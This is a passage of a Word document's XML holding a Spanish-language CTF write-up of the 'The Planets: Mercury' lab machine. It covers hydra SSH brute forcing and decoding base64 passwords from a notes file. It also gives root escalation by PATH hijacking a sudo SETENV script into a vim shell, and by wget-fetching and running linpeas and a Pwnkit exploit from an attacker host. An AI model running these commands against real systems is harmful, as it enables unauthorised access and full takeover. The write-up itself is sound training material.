      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hydra -L users.txt  -P pass.txt   ssh://</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Acceso a la Maquina con SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Accedimos con las credenciales que conseguimos en el paso anterio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r, enumeramos ciertos archivos en la maquina y e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ncontramos una carpeta llamada mercury_project en el cual habia un archivo notes.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> con contenido:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK  // descifrado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mercuryisthesizeof0.056Earths</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==   // descifrado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mercurymeandiameteris4880km</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>El cual desciframos las posibles passwords con echo "bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK" | base64 -d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y asi obtuvimos credenciales de linuxmaster y elevamos privilegios de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ssh webmaster@&lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cat notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>echo "bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Elevación de Privilegios ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Existen dos formas de explotar los privilegios de root en la máquina "The Planets: Mercury":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>La primera forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es a través de la vulnerabilidad encontrada al ejecutar el comando "sudo -l", el cual mostró el siguiente resultado: "(root : root) SETENV: /usr/bin/check_syslog.sh". Luego, utilizaste los siguientes comandos para aprovechar esta vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ln -s /usr/bin/vim tail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>export PATH=$(pwd):$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo --preserve-env=PATH /usr/bin/check_syslog.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explicación: El comando "ln -s /usr/bin/vim tail" crea un enlace simbólico llamado "tail" que apunta al archivo ejecutable de Vim en "/usr/bin/vim". Este enlace simbólico se crea en el directorio actual. Luego, el comando "export PATH=$(pwd):$PATH" agrega el directorio actual al principio de la variable de entorno "PATH". Esto garantiza que el sistema busque los ejecutables en el directorio actual antes que en otros directorios. Finalmente, al ejecutar el comando "sudo --preserve-env=PATH /usr/bin/check_syslog.sh", se abrirá el editor Vim y al escribir </w:t>
      </w:r>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>":!/bin/bash" y presionar Enter,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se obtendrá una shell con privilegios de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="00BA1326" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ln -s /usr/bin/vim tail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>export PATH=$(pwd):$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo --preserve-env=PATH /usr/bin/check_syslog.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>La segunda forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es utilizando la herramienta "linpeas". Esta herramienta realiza una enumeración exhaustiva en busca de posibles métodos de escalada de privilegios. Entre las opciones enumeradas, elegiste utilizar el método Pwnkit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F43E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>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cd /tmp</w:t>
      </w:r>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 xml:space="preserve"> wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007D35AE">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://IP:80/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink>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Chmod +x linpeas.sh</w:t>
      </w:r>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./linpeas.sh</w:t>
      </w:r>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 xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007D35AE">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://IP:80/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pwnkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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chmod +x Pwnkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>./Pwnkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="007F43E3" w:rsidRDefault="007F43E3" w:rsidP="007F43E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B575A" w:rsidRPr="004B575A" w:rsidRDefault="004B575A" w:rsidP="004B575A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Conclusión:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B575A" w:rsidRPr="004B575A" w:rsidRDefault="004B575A" w:rsidP="004B575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En este ejercicio de penetración en la máquina CTF "The Planets: Mercury", se logró obtener acceso exitoso a la máquina víctima y obtener los privilegios de root. El proceso involucró la enumeración de puertos, la identificación de directorios y archivos relevantes, </w:t>
      </w:r>
      <w:r w:rsidRPr="004B575A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>la explotación de vulnerabilidades en la base de datos, el ataque de fuerza bruta de credenciales SSH y finalmente la elevación de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B575A" w:rsidRPr="004B575A" w:rsidRDefault="004B575A" w:rsidP="004B575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Es importante destacar la importancia de seguir buenas prácticas de seguridad, como mantener los sistemas y aplicaciones actualizados, utilizar contraseñas seguras y realizar auditorías de seguridad periódicas. Además, se recomienda corregir las vulnerabilidades identificadas durante este ejercicio y aplicar medidas de mitigación adecuadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F43E3" w:rsidRPr="004B575A" w:rsidRDefault="004B575A" w:rsidP="004B575A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B575A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Este informe tiene como propósito educativo y ha sido realizado en un entorno controlado y autorizado. Las actividades de penetración deben llevarse a cabo de manera ética y legal, con el consentimiento del propietario del sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007F43E3" w:rsidRPr="004B575A"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607BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E5C1D62"/>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351353B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE98C1E0"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40D332CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8ECAB6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41F0209"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9496C366"/>
    <w:lvl w:ilvl="0" w:tplc="0409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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="555B50FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E24987C"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C031BD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49280484"/>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63DE129D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0F09314"/>
    <w:lvl w:ilvl="0" w:tplc="0409000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73170715"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DCF07078"/>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791D2D69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83C21994"/>
    <w:lvl w:ilvl="0" w:tplc="0409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79EB0D46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97B2328C"/>
    <w:lvl w:ilvl="0" w:tplc="0409000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="480A0003">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num w:numId="1" w16cid:durableId="1369834144">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1161508963">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="957100289">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="278419559">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="592321939">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1311787515">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="971597492">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1761482624">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="892160507">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="118038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CF"/>
    <w:rsid w:val="001770CF"/>
    <w:rsid w:val="004B575A"/>
    <w:rsid w:val="004F0A5A"/>
    <w:rsid w:val="00524379"/>
    <w:rsid w:val="005C6C98"/>
    <w:rsid w:val="007F2520"/>
    <w:rsid w:val="007F43E3"/>
    <w:rsid w:val="00BA1326"/>
    <w:rsid w:val="00C6610E"/>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C2FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56CC82CE-EB8D-4EC2-AA9F-AB30ACE3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E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0CF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
